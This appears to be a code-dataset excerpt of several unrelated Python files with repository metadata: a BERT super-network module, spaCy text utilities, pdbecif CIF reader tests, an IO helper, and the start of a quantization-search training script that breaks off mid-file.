encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
self_outputs = self.self(
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:]
return outputs
def set_sample_config(self, bert_hidden_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_num_attention_heads= bert_head_num
self.self.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
self.output.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
class BertIntermediate(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
self.sample_hidden_size = None
self.sample_intermediate_size = None
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
def set_sample_config(self, bert_hidden_size, bert_intermediate_size):
self.sample_hidden_size = bert_hidden_size
self.sample_intermediate_size = bert_intermediate_size
self.dense.set_sample_config(self.sample_hidden_size, self.sample_intermediate_size)
class BertOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.intermediate_size, config.hidden_size)
self.LayerNorm = SuperLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.sample_hidden_size = None
self.sample_intermediate_size = None
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
def set_sample_config(self, bert_hidden_size, bert_intermediate_size):
self.sample_hidden_size = bert_hidden_size
self.sample_intermediate_size = bert_intermediate_size
self.dense.set_sample_config(self.sample_intermediate_size, self.sample_hidden_size)
self.LayerNorm.set_sample_config(self.sample_hidden_size)
class BertLayer(nn.Module):
def __init__(self, config):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = BertAttention(config)
self.is_decoder = config.is_decoder
self.add_cross_attention = config.add_cross_attention
if self.add_cross_attention:
assert self.is_decoder, f"{self} should be used as a decoder model if cross attention is added"
self.crossattention = BertAttention(config)
self.intermediate = BertIntermediate(config)
self.output = BertOutput(config)
self.sample_hidden_size = None
self.sample_intermediate_size = None
self.sample_num_attention_heads = None
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
self_attention_outputs = self.attention(
hidden_states,
attention_mask,
head_mask,
output_attentions=output_attentions,
)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:]
if self.is_decoder and encoder_hidden_states is not None:
assert hasattr(
self, "crossattention"
), f"If `encoder_hidden_states` are passed, {self} has to be instantiated with cross-attention layers by setting `config.add_cross_attention=True`"
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
attention_output = cross_attention_outputs[0]
outputs = outputs + cross_attention_outputs[1:]
layer_output = apply_chunking_to_forward(
self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output
)
outputs = (layer_output,) + outputs
return outputs
def feed_forward_chunk(self, attention_output):
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
def set_sample_config(self, bert_hidden_size, bert_intermediate_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_intermediate_size = bert_intermediate_size
self.sample_num_attention_heads = bert_head_num
self.attention.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
if self.add_cross_attention:
assert self.is_decoder, f"{self} should be used as a decoder model if cross attention is added"
self.crossattention.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
self.intermediate.set_sample_config(self.sample_hidden_size, self.sample_intermediate_size)
self.output.set_sample_config(self.sample_hidden_size, self.sample_intermediate_size)
class BertEncoder(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.layer = nn.ModuleList([BertLayer(config) for _ in range(config.num_hidden_layers)])
self.sample_config = None
self.sample_num_layer = None
self.sample_hidden_size = None
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
output_hidden_states=False,
):
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
for i in range(self.sample_num_layer):
layer_module = self.layer[i]
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
layer_outputs = layer_module(
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
outputs = (hidden_states,)
if output_hidden_states:
outputs = outputs + (all_hidden_states,)
if output_attentions:
outputs = outputs + (all_self_attentions,)
return outputs
def set_sample_config(self, sample_config):
self.sample_config = sample_config
self.sample_num_layer = sample_config['common']["bert_layer_num"]
self.sample_hidden_size = sample_config['common']["bert_hidden_size"]
for i in range(self.sample_num_layer):
tmp_layer = self.layer[i]
index_str = 'layer'+str(i+1)
sample_intermediate_size = sample_config[index_str]['bert_intermediate_size']
sample_num_attention_heads = sample_config[index_str]['bert_head_num']
tmp_layer.set_sample_config(self.sample_hidden_size, sample_intermediate_size, sample_num_attention_heads)
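# For reference, set_sample_config expects a nested dictionary of the shape
# sketched below; the concrete values here are illustrative only and are not
# taken from any particular search run.
#
#     sample_config = {
#         "common": {"bert_layer_num": 6, "bert_hidden_size": 512},
#         "layer1": {"bert_intermediate_size": 1024, "bert_head_num": 8},
#         "layer2": {"bert_intermediate_size": 2048, "bert_head_num": 12},
#         # ... one "layerN" entry per sampled layer, up to bert_layer_num
#     }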
class BertPooler(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
self.sample_hidden_size = None
def forward(self, hidden_states):
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
def set_sample_config(self, bert_hidden_size):
self.sample_hidden_size = bert_hidden_size
self.dense.set_sample_config(self.sample_hidden_size, self.sample_hidden_size)
class BertPreTrainedModel(PreTrainedModel):
config_class = BertConfig
load_tf_weights = load_tf_weights_in_bert
base_model_prefix = "bert"
authorized_missing_keys = [r"position_ids"]
def _init_weights(self, module):
""" Initialize the weights """
if isinstance(module, (SuperEmbedding, SuperLinear)):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, SuperLayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, SuperLinear) and module.bias is not None:
module.bias.data.zero_()
class BertModel(BertPreTrainedModel):
def __init__(self, config, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.embeddings = BertEmbeddings(config)
self.encoder = BertEncoder(config)
self.pooler = BertPooler(config) if add_pooling_layer else None
self.init_weights()
self.sample_config = None
self.sample_hidden_size = None
self.add_pooling_layer = add_pooling_layer
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=None,
output_hidden_states=None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if attention_mask is None:
attention_mask = torch.ones(input_shape, device=device)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
outputs = (sequence_output, pooled_output,) + encoder_outputs[1:]
return outputs
def set_sample_config(self, sample_config):
self.sample_config = sample_config
self.sample_hidden_size = sample_config['common']["bert_hidden_size"]
self.embeddings.set_sample_config(self.sample_hidden_size)
self.encoder.set_sample_config(self.sample_config)
if self.add_pooling_layer:
self.pooler.set_sample_config(self.sample_hidden_size)
class BertForSequenceClassification(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = BertModel(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = SuperLinear(config.hidden_size, config.num_labels)
self.init_weights()
self.sample_config = None
self.sample_hidden_size = None
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
labels=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
):
outputs = self.bert(
input_ids,
attention_mask = attention_mask,
token_type_ids = token_type_ids,
position_ids = position_ids,
head_mask = head_mask,
inputs_embeds = inputs_embeds,
output_attentions = output_attentions,
output_hidden_states = output_hidden_states,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
outputs = (logits,) + outputs[2:]
loss = None
if labels is not None:
if self.num_labels == 1:
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs
def set_sample_config(self, sample_config):
self.sample_config = sample_config
self.sample_hidden_size = sample_config['common']["bert_hidden_size"]
self.bert.set_sample_config(self.sample_config)
self.classifier.set_sample_config(self.sample_hidden_size, self.num_labels)
def get_sampled_params_numel(self, config):
self.set_sample_config(config)
numels = []
for name, module in self.named_modules():
if hasattr(module, 'calc_sampled_param_num'):
if name == 'classifier':
continue
                if name.split('.')[1] == 'encoder' and int(name.split('.')[3]) + 1 > config['common']['bert_layer_num']:  # int() instead of eval() for the layer index
continue
numels.append(module.calc_sampled_param_num())
return sum(numels)
def profile(self, mode = True):
for module in self.modules():
if hasattr(module, 'profile') and self != module:
module.profile(mode)
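# Illustrative usage sketch (assumed values): a sub-network is activated by
# passing a sample_config dictionary of the shape sketched above the
# BertPooler class, after which its parameter count can be queried.
#
#     config = BertConfig()                        # super-network configuration
#     model = BertForSequenceClassification(config)
#     model.set_sample_config(sample_config)       # activate one sub-network
#     n_params = model.get_sampled_params_numel(sample_config)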
| 35.968707
| 159
| 0.689413
|
c67c5fce4a1db4284c2b998cd9ee1376ba526bde
| 1,073
|
py
|
Python
|
text_complexity_analyzer_cm/utils/utils.py
|
seduerr91/persuasiveness-metric
|
ea1c0cffe5a3fd9d2e423e54b35942127fe94b97
|
[
"MIT"
] | 1
|
2022-03-08T21:31:23.000Z
|
2022-03-08T21:31:23.000Z
|
text_complexity_analyzer_cm/utils/utils.py
|
seduerr91/persuasiveness-metric
|
ea1c0cffe5a3fd9d2e423e54b35942127fe94b97
|
[
"MIT"
] | null | null | null |
text_complexity_analyzer_cm/utils/utils.py
|
seduerr91/persuasiveness-metric
|
ea1c0cffe5a3fd9d2e423e54b35942127fe94b97
|
[
"MIT"
] | null | null | null |
import spacy
from spacy.tokens import Doc
from spacy.tokens import Span
from spacy.tokens import Token
from typing import List
from text_complexity_analyzer_cm.constants import ACCEPTED_LANGUAGES
def split_text_into_paragraphs(text: str) -> List[str]:
    text_aux = text.strip()  # Remove leading/trailing whitespace around the whole text
    paragraphs = text_aux.split('\n\n')  # Paragraphs are separated by blank lines
    return [p.strip() for p in paragraphs if len(p.strip()) > 0]  # Don't count empty paragraphs
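# Example (illustrative): paragraphs are separated by blank lines, so
#
#     split_text_into_paragraphs("First paragraph.\n\nSecond paragraph.\n\n")
#
# returns ['First paragraph.', 'Second paragraph.'].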
def split_text_into_sentences(text: str) -> List[str]:
nlp = spacy.load('en_core_web_sm', disable=['tagger', 'parser', 'ner'])
nlp.add_pipe('sentencizer')
text_spacy = nlp(text)
return [str(sentence) for sentence in text_spacy.sents]
def is_content_word(token: Token) -> bool:
result = token.is_alpha and token.pos_ in ['PROPN', 'NOUN', 'VERB', 'ADJ', 'ADV']
return result
def is_word(token: Token) -> bool:
return token.is_alpha
def split_doc_into_sentences(doc: Doc) -> List[Span]:
return [s for s in doc.sents if len(s.text.strip()) > 0]
| 29
| 87
| 0.702703
|
1717adcfa9b8ddee2f36bb1a7e12d032dd9d49ec
| 4,064
|
py
|
Python
|
test/test_CifFileReader.py
|
PDBeurope/pdbecif
|
cd5319b416260b8e13485548f6a40bb9e3856e19
|
[
"Apache-2.0"
] | 15
|
2020-05-18T22:30:05.000Z
|
2022-03-28T10:57:25.000Z
|
test/test_CifFileReader.py
|
SuperXiang/pdbecif
|
cd5319b416260b8e13485548f6a40bb9e3856e19
|
[
"Apache-2.0"
] | 1
|
2021-05-13T03:13:02.000Z
|
2021-05-13T03:13:02.000Z
|
test/test_CifFileReader.py
|
SuperXiang/pdbecif
|
cd5319b416260b8e13485548f6a40bb9e3856e19
|
[
"Apache-2.0"
] | 1
|
2022-02-08T08:24:30.000Z
|
2022-02-08T08:24:30.000Z
|
import os
import unittest
import pdbecif.mmcif_io as mmcif_IO
from pdbecif.mmcif import CifFile, CIFWrapper
class CifFileReaderTestCase(unittest.TestCase):
def setUp(self):
self.FILE_ROOT = os.path.dirname(os.path.abspath(__file__))
self.TEST_CIF_FILE = os.path.join(self.FILE_ROOT, "test_data/usage-example.cif")
self.TEST_DIC_FILE = os.path.join(self.FILE_ROOT, "test_data/usage-example.dic")
self.TEST_CSD_CIF_FILE = os.path.join(self.FILE_ROOT, "test_data/test_csd.cif")
def __assertEqual(self, l1, l2, msg):
if isinstance(l1, list):
l1.sort()
if isinstance(l2, list):
l2.sort()
return self.assertEqual(l1, l2, msg)
def test_inData_outDict(self):
cfr = mmcif_IO.CifFileReader(input="data", preserve_order=True)
cif_dictionary = cfr.read(self.TEST_CIF_FILE, output="cif_dictionary")
self.assertIsInstance(
cif_dictionary, dict, "Failed to create python dictionary from cif file"
)
self.__assertEqual(
list(cif_dictionary.keys()),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_dictionary["BLOCK_2"]["_extra"]["strange_value"],
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_inData_outWrap(self):
cfr = mmcif_IO.CifFileReader(input="data", preserve_order=True)
cif_wrapper = cfr.read(self.TEST_CIF_FILE, output="cif_wrapper")
self.assertIsInstance(
cif_wrapper["TEST_CIF"],
CIFWrapper,
"Failed to create CIFWrapper using lexical parser",
)
self.__assertEqual(
list(cif_wrapper.keys()),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_wrapper["BLOCK_2"]._extra.strange_value[0],
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_inData_outFile(self):
cfr = mmcif_IO.CifFileReader(input="data", preserve_order=True)
cif_file = cfr.read(self.TEST_CIF_FILE, output="cif_file")
self.assertIsInstance(
cif_file, CifFile, "Failed to create CifFile using algorithmic parser"
)
self.__assertEqual(
cif_file.getDataBlockIds(),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_file.getDataBlock("BLOCK_2")
.getCategory("_extra")
.getItem("strange_value")
.value,
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_inDict_outFile(self):
cfr = mmcif_IO.CifFileReader(input="dictionary", preserve_order=True)
cif_file = cfr.read(self.TEST_CIF_FILE, output="cif_file")
self.assertIsInstance(
cif_file, CifFile, "Failed to create CifFile using lexical parser"
)
self.__assertEqual(
cif_file.getDataBlockIds(),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_file.getDataBlock("BLOCK_2")
.getCategory("_extra")
.getItem("strange_value")
.value,
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_cif_noCategory(self):
cfr = mmcif_IO.CifFileReader()
cif_dictionary = cfr.read(self.TEST_CSD_CIF_FILE, output="cif_dictionary")
self.assertIsInstance(cif_dictionary, dict)
first_key = list(cif_dictionary.keys())[0]
csd_content = cif_dictionary[first_key][""]
self.assertIsInstance(csd_content, dict)
self.assertEqual(len(csd_content), 13)
if __name__ == "__main__":
unittest.main()
| 35.33913
| 88
| 0.616388
|
40854b7a7256652d40ce8fbb75bc16713abc5c37
| 2,145
|
py
|
Python
|
spiral/utils/io.py
|
acdaniells/spiral
|
d78344007969d7c991216901b4a9d3ad7d768587
|
[
"BSD-3-Clause"
] | null | null | null |
spiral/utils/io.py
|
acdaniells/spiral
|
d78344007969d7c991216901b4a9d3ad7d768587
|
[
"BSD-3-Clause"
] | 1
|
2020-04-01T18:39:48.000Z
|
2020-04-01T18:39:48.000Z
|
spiral/utils/io.py
|
acdaniells/spiral
|
d78344007969d7c991216901b4a9d3ad7d768587
|
[
"BSD-3-Clause"
] | 1
|
2020-04-01T18:36:44.000Z
|
2020-04-01T18:36:44.000Z
|
"""
Spiral IO utility.
"""
from spiral.core.exc import SpiralError
import pandas as pd
import pkg_resources
def get_package_name() -> str:
"""
Get the package name.
Returns
-------
str
The package name.
"""
return __name__.split(".")[0]
def resource_exists(filename: str) -> bool:
"""
Check if a package resource exists.
Parameters
----------
filename : str
The filename.
Returns
-------
bool
True if the file exists otherwise False.
"""
return pkg_resources.resource_exists(get_package_name(), filename)
def resource_filename(filename: str) -> str:
"""
    Get the full path to a package resource.
Parameters
----------
filename : str
The filename.
Returns
-------
str
        The full path to the package resource.
"""
return pkg_resources.resource_filename(get_package_name(), filename)
def open_file(filename: str, compression: str = "infer"):
if filename.endswith(".gz"):
import gzip
with gzip.GzipFile(filename, "r") as fp:
return fp.read()
else:
with open(filename) as fp:
return fp.read()
def read_data(filename: str, compression="infer"):
from pathlib import Path
extensions = Path(filename).suffixes
if ".csv" in extensions:
return read_csv(filename, compression=compression)
elif ".json" in extensions or ".geojson" in extensions:
return read_json(filename, compression=compression)
else:
raise SpiralError(f"Unrecognised extension(s): {extensions}")
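# Illustrative usage sketch (file names are assumptions): read_data dispatches
# on the file extension(s), and gzipped JSON is decompressed via open_file.
#
#     df = read_data("measurements.csv")
#     geo = read_data("regions.geojson.gz")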
def read_csv(filename: str, **kwargs) -> pd.DataFrame:
"""
Read a CSV file into a data frame.
Parameters
----------
filename : str
The filename.
**kwargs
The keyword arguments for the pandas.read_csv call.
Returns
-------
DataFrame
A pandas DataFrame containing the CSV data.
"""
return pd.read_csv(filename, **kwargs)
def read_json(filename: str, compression="infer") -> dict:
import json
return json.loads(open_file(filename, compression))
| 19.678899
| 72
| 0.617249
|
4cd28db9c92a0decfcc7d935c58b6ed223ee9fb0
| 30,758
|
py
|
Python
|
search_attention.py
|
Euphoria16/GMPQ
|
f93f8428bc025e01ab01c8f8ffd1d551598f716a
|
[
"MIT"
] | 16
|
2021-08-05T17:12:36.000Z
|
2022-01-08T11:23:14.000Z
|
search_attention.py
|
Euphoria16/GMPQ
|
f93f8428bc025e01ab01c8f8ffd1d551598f716a
|
[
"MIT"
] | 2
|
2021-08-17T01:37:38.000Z
|
2021-11-29T10:34:11.000Z
|
search_attention.py
|
Euphoria16/GMPQ
|
f93f8428bc025e01ab01c8f8ffd1d551598f716a
|
[
"MIT"
] | 2
|
2021-08-06T03:38:01.000Z
|
2021-08-21T07:36:01.000Z
|
import argparse
import os
import random
import shutil
import time
import warnings
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
import torch.multiprocessing as mp
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import models as models
from aircraft import Aircraft
import torch.nn.functional as F
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('-a', '--arch', metavar='ARCH', default='resnet18',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: resnet18)')
parser.add_argument('-fa', '--fullarch', metavar='FULLARCH', default='qresnet18',
choices=model_names,
help='full model architecture: ' +
' | '.join(model_names) +
' (default: qresnet18)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--step-epoch', default=30, type=int, metavar='N',
help='number of epochs to decay learning rate')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=256, type=int,
metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate', dest='lr')
parser.add_argument('--lra', '--learning-rate-alpha', default=0.01, type=float,
metavar='LR', help='initial alpha learning rate')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--aux-weight', '--aw', default=20, type=float, metavar='W',
help='attribution loss weight')
parser.add_argument('--pnorm', default=3, type=int, metavar='W',
help='p-norm')
parser.add_argument('--product', default=24, type=float, metavar='W',
help='product for p-norm')
parser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('--complexity-decay', '--cd', default=0, type=float,
                    metavar='W', help='complexity decay (default: 0)')
parser.add_argument('-p', '--print-freq', default=100, type=int,
                    metavar='N', help='print frequency (default: 100)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument('--dataname', default='imagenet', type=str,
help='dataset name')
parser.add_argument('--expname', default='exp', type=str,
help='exp name')
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training. ')
parser.add_argument('--gpu', default=None, type=int,
help='GPU id to use.')
parser.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
best_acc1 = 0
def main():
args = parser.parse_args()
print(args)
if args.seed is not None:
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
warnings.warn('You have chosen to seed training. '
'This will turn on the CUDNN deterministic setting, '
'which can slow down your training considerably! '
'You may see unexpected behavior when restarting '
'from checkpoints.')
if args.gpu is not None:
warnings.warn('You have chosen a specific GPU. This will completely '
'disable data parallelism.')
if args.dist_url == "env://" and args.world_size == -1:
args.world_size = int(os.environ["WORLD_SIZE"])
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
ngpus_per_node = torch.cuda.device_count()
print('ngpus_per_node',ngpus_per_node)
if args.multiprocessing_distributed:
# Since we have ngpus_per_node processes per node, the total world_size
# needs to be adjusted accordingly
args.world_size = ngpus_per_node * args.world_size
# Use torch.multiprocessing.spawn to launch distributed processes: the
# main_worker process function
mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
else:
# Simply call main_worker function
main_worker(args.gpu, ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, args):
global best_acc1
args.gpu = gpu
if args.gpu is not None:
print("Use GPU: {} for training".format(args.gpu))
if args.distributed:
if args.dist_url == "env://" and args.rank == -1:
args.rank = int(os.environ["RANK"])
if args.multiprocessing_distributed:
# For multiprocessing distributed training, rank needs to be the
# global rank among all the processes
args.rank = args.rank * ngpus_per_node + gpu
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
# create model
print("=> creating model '{}'".format(args.arch))
if args.dataname=='cifar10':
num_classes=10
elif args.dataname=='imagenet':
num_classes=1000
elif args.dataname=='flower':
num_classes=102
elif args.dataname=='aircraft':
num_classes=100
elif args.dataname=='cub':
num_classes=200
elif args.dataname=='cars':
num_classes=196
elif args.dataname=='food':
num_classes=101
elif args.dataname == 'pets':
num_classes = 37
else:
raise NotImplementedError
model = models.__dict__[args.arch](num_classes=num_classes)
full_model = models.__dict__[args.fullarch](pretrained=args.pretrained,num_classes=num_classes)
if args.distributed:
# For multiprocessing distributed, DistributedDataParallel constructor
# should always set the single device scope, otherwise,
# DistributedDataParallel will use all available devices.
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
model.cuda(args.gpu)
# When using a single GPU per process and per
# DistributedDataParallel, we need to divide the batch size
# ourselves based on the total number of GPUs we have
args.batch_size = int(args.batch_size / ngpus_per_node)
args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
else:
model.cuda()
# DistributedDataParallel will divide and allocate batch_size to all
# available GPUs if device_ids are not set
model = torch.nn.parallel.DistributedDataParallel(model)
elif args.gpu is not None:
torch.cuda.set_device(args.gpu)
model = model.cuda(args.gpu)
else:
# DataParallel will divide and allocate batch_size to all available GPUs
if 'alex' in args.arch or 'vgg' in args.arch:
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
full_model =torch.nn.DataParallel(full_model).cuda()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(args.gpu)
# group model/architecture parameters
params, alpha_params = [], []
for name, param in model.named_parameters():
if 'alpha' in name:
alpha_params += [param]
else:
params += [param]
optimizer = torch.optim.SGD(params, args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
arch_optimizer = torch.optim.SGD(alpha_params, args.lra, momentum=args.momentum,
weight_decay=args.weight_decay)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
if args.gpu is None:
checkpoint = torch.load(args.resume)
else:
# Map model to be loaded to specified single gpu.
loc = 'cuda:{}'.format(args.gpu)
checkpoint = torch.load(args.resume, map_location=loc)
args.start_epoch = checkpoint['epoch']
best_acc1 = checkpoint['best_acc1']
if args.gpu is not None:
# best_acc1 may be from a checkpoint from a different GPU
best_acc1 = best_acc1.to(args.gpu)
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
arch_optimizer.load_state_dict(checkpoint['arch_optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
cudnn.benchmark = True
# Data loading code
if args.dataname == 'imagenet':
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
if 'inception' in args.arch:
crop_size, short_size = 299, 342
else:
crop_size, short_size = 224, 256
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]))
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),
num_workers=args.workers, pin_memory=True, sampler=train_sampler)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, transforms.Compose([
transforms.Resize(short_size),
transforms.CenterCrop(crop_size),
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
elif args.dataname == 'cifar10':
dataloader = datasets.CIFAR10
transform_train = transforms.Compose([
